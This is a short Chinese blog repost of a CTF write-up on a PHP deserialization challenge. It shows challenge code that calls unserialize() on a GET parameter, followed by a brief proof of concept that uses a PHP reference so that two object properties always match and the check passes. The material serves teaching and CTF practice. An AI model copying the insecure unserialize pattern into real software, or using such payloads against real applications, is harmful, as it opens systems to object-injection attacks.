南邮PHP反序列化

时间：2018-08-04 10:14:22 阅读：424 评论：0 收藏：0 [点我收藏+]

题目如下：

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET[‘pass‘])) {
    $pass = $_GET[‘pass‘];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can‘t fool me";
    }
    else echo "are you trolling?";
}
?>

主要是涉及了一个PHP对象深浅拷贝，文章：

直接构造POC：

<?php 
class just4fun
{
    var $enter;
    var $secret;
    
    function __construct()
    {
        $this->enter=&$this->secret;
    }
}
echo serialize(new just4fun());

 ?>

南邮PHP反序列化

原文：https://www.cnblogs.com/nul1/p/9417484.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)